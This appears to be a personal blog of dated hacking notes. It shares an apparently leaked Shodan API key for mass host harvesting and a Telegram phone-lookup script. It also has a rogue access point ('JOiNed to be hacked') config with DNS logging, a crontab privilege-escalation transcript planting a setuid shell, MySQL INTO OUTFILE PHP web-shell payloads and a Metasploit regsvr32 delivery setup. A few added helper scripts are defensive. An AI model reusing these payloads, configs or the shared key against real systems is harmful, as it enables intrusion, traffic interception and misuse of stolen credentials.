Thursday, July 8, 2021

C programming Loads

Preprocessing:
gcc -E -P cube-prog.c -o cube-prog.i
Compilation:
gcc -S cube-prog.i -o cube-prog.s
Assembly:
gcc -c cube-prog.s -o cube-prog.o

C Programming in One Hour a Day, Sams Teach Yourself 7th Edition


Sunday, July 4, 2021

Shodan

Greetings to all, I am spreading the Shodan key for 200k credits. I think many are looking for this key and it will be useful to many! A key without an activation limit, even the entire forum can activate and use it ... Profitable use for everyone!
CLI installation -> pip install -U --user shodan -> then in the terminal ---> shodan init PSKINdQe1GyxGgecYz2191H2JoS9qvgD -> then check with shodan info -> then make sure there are 200k credits on board ..
Example of downloading from Shodan as well as parsing the IP addresses:
Let's say we are looking for BigIP.
1) shodan download --limit 50000 bigip.json.gz bigip -> download starts
2) gzip -d bigip.json.gz -> unpack the gzip archive
3) shodan parse --fields ip_str,port bigip.json > bigip.txt (or, without ports: shodan parse --fields ip_str bigip.json > bigip.txt)
4) you can use all kinds of filters, let's say shodan download --limit 50000 bigip.json.gz 'bigip country:"US"', etc.

Thank you all for your attention! Have a nice day, everyone!
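Step 3 above is what `shodan parse --fields` does. As an added example that is not part of the quoted post, here is the same field extraction in Python over a constructed export (newline-delimited JSON, one banner per line), which also handles duplicate banners, truncated lines and records missing a field; the addresses are made up. This is the kind of post-processing you would run on an export of your own organisation's exposed services.

```python
import json

# Constructed sample of what `shodan download` writes after gunzip: newline-delimited JSON,
# one banner record per line. Addresses are documentation ranges, made up for this example.
SAMPLE_EXPORT = "\n".join([
    json.dumps({"ip_str": "203.0.113.10", "port": 443, "transport": "tcp", "product": "BIG-IP"}),
    json.dumps({"ip_str": "203.0.113.10", "port": 8443, "transport": "tcp"}),
    json.dumps({"ip_str": "198.51.100.7", "port": 443, "transport": "tcp"}),
    json.dumps({"ip_str": "198.51.100.7", "port": 443, "transport": "tcp"}),  # duplicate banner
    "{not valid json",                                                         # truncated line
    json.dumps({"ip": 3405803786, "port": 22}),                               # no ip_str field
])

def parse_banners(lines, fields):
    """Equivalent of `shodan parse --fields a,b`: one tuple per record in file order.
    Lines that are not JSON are skipped; a missing field becomes None."""
    rows = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        rows.append(tuple(rec.get(f) for f in fields))
    return rows

def unique_ip_ports(lines):
    """Sorted, deduplicated 'ip:port' strings; records lacking either field are dropped."""
    return sorted({f"{ip}:{port}" for ip, port in parse_banners(lines, ["ip_str", "port"]) if ip and port})

def unique_ips(lines):
    """Sorted, deduplicated hosts only, the `--fields ip_str` variant."""
    return sorted({ip for (ip,) in parse_banners(lines, ["ip_str"]) if ip})
```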

Linux kernel: update and debug (rebuild the initramfs for every installed kernel)

 sudo update-initramfs -k all -c

Thursday, July 1, 2021

adsds

python3 -m pip install python-telegram

from telegram.client import Telegram

# api_id/api_hash come from my.telegram.org; phone is the account that performs the lookup
tg = Telegram(
    api_id='YOUR API ID',
    api_hash='YOUR API HASH',
    phone='+575555555555',
    database_encryption_key='changeme1234',
)

tg.login()  # interactive on first run: asks for the login code (and the 2FA password if set)

# importContacts returns one user_id per submitted number; 0 means no Telegram account
response = tg.call_method('importContacts', {
    'contacts': [
        {'phone_number': '+57 555 123 4567'},
    ]
})

response.wait()
if response.error:
    raise SystemExit(f'importContacts failed: {response.error_info}')

user_ids = response.update['user_ids']

if user_ids[0] == 0:
    print('This contact is NOT using Telegram.')
else:
    print(f'This contact ({user_ids[0]}) uses Telegram!')

 


Sunday, June 27, 2021

Hping3

 hping3
--------------------------------------------------------

hping send {ip(daddr=192.168.56.1)+icmp(type=8,code=0)}

tcpdump -i wlan0

=========================================================

foreach i [list 5 6 7 8 9 10] {hping send "ip(daddr=192.168.56.1,ttl=$i)+icmp(type=8,code=0)"}
sudo tcpdump -i wlan0 -x -vv | grep ICMP

============================================================

while 1 {
    set p [lindex [hping recv eth0] 0]
    puts "[hping getfield ip saddr $p] -> [hping getfield ip ttl $p]"
}
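The Tcl loop above pulls the source address and TTL out of each received packet with `hping getfield`. As an added example (not hping's code), the same field extraction in plain Python over a constructed IPv4/ICMP echo request built the way `ip(daddr=...,ttl=...)+icmp(type=8,code=0)` describes; unlike the one-liner, it verifies both checksums before trusting any field, which is what a capture parser or detector should do with packets it did not craft itself.

```python
import socket
import struct

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (used by both IPv4 and ICMP)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_ipv4_icmp(saddr: str, daddr: str, ttl: int, icmp_type: int = 8, code: int = 0) -> bytes:
    """Constructed echo request, the equivalent of hping's
    ip(daddr=...,ttl=...)+icmp(type=8,code=0): 20-byte IPv4 header + 8-byte ICMP header."""
    icmp = struct.pack("!BBHHH", icmp_type, code, 0, 0x1234, 1)      # checksum field zeroed
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, ttl, 1, 0,
                      socket.inet_aton(saddr), socket.inet_aton(daddr))
    hdr = hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]
    return hdr + icmp

def getfields(pkt: bytes) -> dict:
    """Same fields the Tcl loop reads with `hping getfield ip saddr/ttl`, plus the ICMP
    type/code, with both checksums verified before anything is returned."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (pkt[0] & 0x0F) * 4
    if inet_checksum(pkt[:ihl]) != 0:
        raise ValueError("bad IPv4 header checksum")
    fields = {"saddr": socket.inet_ntoa(pkt[12:16]), "daddr": socket.inet_ntoa(pkt[16:20]),
              "ttl": pkt[8], "proto": pkt[9]}
    if fields["proto"] == 1:                                           # ICMP
        icmp = pkt[ihl:]
        if len(icmp) < 8 or inet_checksum(icmp) != 0:
            raise ValueError("bad ICMP checksum")
        fields["icmp_type"], fields["icmp_code"] = icmp[0], icmp[1]
    return fields
```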

===============================================================
sudo vi attack.sig
sudo hping3 -2 -p 500 192.168.56.1 -d 137 -E attack.sig


Wireshark display filter: udp.port==500 || icmp
tcpdump -i wlan0 -nX

Friday, June 25, 2021

Terminal Note

 --------------

Show the hidden entries (dot files and directories) in the current directory:

1.  ls -d .[!.]?* 


=====

Shortcut key 

CTRL+A = move to the beginning of the line
CTRL+E = move to the end of the line
CTRL+F = move forward one character at a time
CTRL+B = move backward one character at a time
CTRL+D = delete the character under the cursor
CTRL+W = delete the word before the cursor
CTRL+T = swap the two characters around the cursor
ALT+U = uppercase the word from the cursor
ALT+L = lowercase the word from the cursor


Tuesday, June 22, 2021

SSH TUNNELING

mkfifo /tmp/packet_capture    (on the destination host)

tcpdump -i <current interface> -w - | ssh [Destination Name]@[Destination ip] -c [Encryption] -C -p 22 "cat - > /tmp/packet_capture"

Example:

tcpdump -i enp0s3 -w - | ssh admin@192.168.1.3 -c arcfour,blowfish-cbc -C -p 22 "cat - > /tmp/packet_capture"

Note: arcfour and blowfish-cbc are legacy ciphers that current OpenSSH releases no longer enable, so drop -c to let both ends negotiate a modern cipher. A fifo blocks the writer until something reads it, so start the reader on the destination (e.g. tcpdump -r /tmp/packet_capture) before the stream.

Saturday, June 19, 2021

hacking tips

-------------------------------------------
-----------#monitor mode--------------------
sudo ip link set wlan1 down
sudo iw dev wlan1 set type monitor
sudo ip link set wlan1 up
-------------------------------------------
-----------#install tool--------------------
apt-get install hostapd dnsmasq apache2 aircrack-ng
-----------#checking the monitor mode-------
sudo airodump-ng wlan1
--------------------------------------------
-----------#setup IP for Interface----------
sudo ip link set wlan1 down
sudo ifconfig wlan1 up 192.168.0.1 netmask 255.255.255.0
sudo route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1
sudo ip link set wlan1 up
---------------------------------------------
------------#configure dnsmasq.conf----------
interface=wlan1
dhcp-range=192.168.0.2,192.168.0.30,255.255.255.0,12h
dhcp-option=3,192.168.0.1
dhcp-option=6,192.168.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
---------------------------------------------
------------#configure hostapd.conf----------
interface=wlan1
driver=nl80211
ssid=JOiNed to be hacked
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
------------------------------------------------------
#Prevent the local DNS client from running (it would hold port 53)
sudo ss -lp "sport = :domain"
sudo systemctl stop systemd-resolved

#creating firewall (NAT traffic from wlan1 out through wlan0)
sudo iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
sudo iptables --append FORWARD --in-interface wlan1 -j ACCEPT
#ip forwarding (either form; a plain "sudo echo 1 > file" fails because the redirect is not run as root)
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo sysctl net.ipv4.ip_forward=1

=================================
sudo dnsmasq -C dnsmasq.conf -d
sudo hostapd /etc/hostapd.conf
---------------------------------
sudo systemctl unmask systemd-resolved
sudo systemctl enable systemd-resolved

sudo lsof -i -P -n | grep LIST
 ----------------------------------------------

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT

Saturday, June 12, 2021

Finding the domain and sub-domains



- subbrute.py
- nmap --script dns-brute
- dnsmap
- fierce -dns
- Sublist3r

Finding similar domain

- urlcrazy -p

sudo nmap --traceroute --script traceroute-geolocation www.google.com

Tuesday, May 25, 2021

Crontab privilege escalation

 www-data@red:/etc$ ls -la cron*
ls -la cron*
-rw-r--r-- 1 root root  722 Apr  5  2016 crontab

cron.d:
total 32
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Jun  3  2016 .placeholder
-rw-r--r--   1 root root    56 Jun  3  2016 logrotate
-rw-r--r--   1 root root   589 Jul 16  2014 mdadm
-rw-r--r--   1 root root   670 Mar  1  2016 php

cron.daily:
total 56
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root   539 Apr  5  2016 apache2
-rwxr-xr-x   1 root root   376 Mar 31  2016 apport
-rwxr-xr-x   1 root root   920 Apr  5  2016 apt-compat
-rwxr-xr-x   1 root root  1597 Nov 26  2015 dpkg
-rwxr-xr-x   1 root root   372 May  6  2015 logrotate
-rwxr-xr-x   1 root root   539 Jul 16  2014 mdadm
-rwxr-xr-x   1 root root   249 Nov 12  2015 passwd
-rwxr-xr-x   1 root root   383 Mar  8  2016 samba
-rwxr-xr-x   1 root root   214 Apr 12  2016 update-notifier-common

cron.hourly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

cron.monthly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

cron.weekly:
total 28
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root    86 Apr 13  2016 fstrim
-rwxr-xr-x   1 root root   211 Apr 12  2016 update-notifier-common
www-data@red:/etc$ cd cron.d    
cd cron.d
www-data@red:/etc/cron.d$ ls
ls
logrotate  mdadm  php
www-data@red:/etc/cron.d$ ls -la
ls -la
total 32
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 May 25 11:38 ..
-rw-r--r--   1 root root   102 Jun  3  2016 .placeholder
-rw-r--r--   1 root root    56 Jun  3  2016 logrotate
-rw-r--r--   1 root root   589 Jul 16  2014 mdadm
-rw-r--r--   1 root root   670 Mar  1  2016 php
www-data@red:/etc/cron.d$ cd logrotate
cd logrotate
bash: cd: logrotate: Not a directory
www-data@red:/etc/cron.d$ cat logrotate
cat logrotate
*/5 *   * * *   root  /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc/cron.d$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
www-data@red:/etc/cron.d$ cd ..
cd ..
www-data@red:/etc$ echo "cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit">> /usr/local/sbin/cron-logrotate.sh
www-data@red:/etc$ cat /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
#Simon, you really need to-do something about this
cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit;chmod root:root /tmp/exploit
www-data@red:/etc$ cd
cd
bash: cd: HOME not set
www-data@red:/etc$ cd ..
cd ..
www-data@red:/$ /tmp/exploit -p
/tmp/exploit -p
# cd /root
cd /root
# ls
ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
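The session above works because a root cron job points at a script that www-data can write to. As an added example (not from the box or any tool on this page), here is a small check that parses /etc/cron.d style entries and flags root jobs whose target is missing, not root-owned, or group/world-writable; the sample entries and the fake stat table are constructed so it runs offline, and only the cron-logrotate.sh path is taken from the session.

```python
import os
import stat
# Constructed sample /etc/cron.d content and a stand-in for os.stat so the check runs
# offline. Only the cron-logrotate.sh path comes from the session above; the rest is made up.
SAMPLE_CRON_D = """\
SHELL=/bin/sh
*/5 *   * * *   root  /usr/local/sbin/cron-logrotate.sh
0 3 * * * root /opt/backup.sh --quiet
17 * * * * root /etc/cron.hourly/missing.sh
0 * * * * www-data /usr/local/sbin/cron-logrotate.sh
"""
SAMPLE_FS = {  # path -> (owner uid, permission bits)
    "/usr/local/sbin/cron-logrotate.sh": (0, 0o777),  # root-owned but world-writable
    "/opt/backup.sh": (33, 0o755),                    # owned by www-data, not root
}

def fake_stat(path):
    if path not in SAMPLE_FS:
        raise FileNotFoundError(path)
    uid, mode = SAMPLE_FS[path]
    return os.stat_result((stat.S_IFREG | mode, 0, 0, 1, uid, 0, 0, 0, 0, 0))

def parse_cron_d_line(line):
    """System crontab entry: five schedule fields, a user, then the command; {} otherwise."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return {}  # blank, comment or environment assignment
    parts = line.split(None, 6)
    if len(parts) < 7:
        return {}
    return {"schedule": " ".join(parts[:5]), "user": parts[5], "command": parts[6]}

def writable_root_jobs(lines, stat_fn=os.stat):
    """Flag root jobs whose executable is missing, not root-owned, or group/world-writable."""
    findings = []
    for line in lines:
        job = parse_cron_d_line(line)
        if not job or job["user"] != "root":
            continue
        path = job["command"].split()[0]
        if not path.startswith("/"):
            continue  # bare name resolved via PATH; not covered by this check
        try:
            st = stat_fn(path)
        except FileNotFoundError:
            findings.append({**job, "reason": "target does not exist"})
            continue
        if st.st_uid != 0:
            findings.append({**job, "reason": f"target owned by uid {st.st_uid}, not root"})
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append({**job, "reason": "target is group- or world-writable"})
    return findings
```

Run it against the real files with `writable_root_jobs(open("/etc/cron.d/logrotate").read().splitlines())`; the same parser applies to /etc/crontab, while per-user crontabs have no user column.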

MySQL privilege escalation

For Windows:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php";

For Linux:

SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php";

Both need the FILE privilege on the MySQL account and a target directory the mysqld process can write to; a non-empty secure_file_priv setting confines or disables INTO OUTFILE, which is the setting to check when hardening.



msf6 > search regsvr32

Matching Modules
================

   #  Name                                               Disclosure Date  Rank    Check  Description
   -  ----                                               ---------------  ----    -----  -----------
   0  auxiliary/server/regsvr32_command_delivery_server                   normal  No     Regsvr32.exe (.sct) Command Delivery Server
   1  exploit/multi/script/web_delivery                  2013-07-19       manual  No     Script Web Delivery


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/script/web_delivery

msf6 > use 0
msf6 auxiliary(server/regsvr32_command_delivery_server) > show options

Module options (auxiliary/server/regsvr32_command_delivery_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD                       no        The command to execute
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVHOST 192.168.1.5
SRVHOST => 192.168.1.5
msf6 auxiliary(server/regsvr32_command_delivery_server) > set SRVPORT 4444
SRVPORT => 4444

Installation of WPScan

1) Install Ruby: sudo apt install ruby

2) Install the dependencies needed to build native extensions: sudo apt install build-essential libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev libgmp-dev zlib1g-dev

3) Install WPScan: sudo gem install wpscan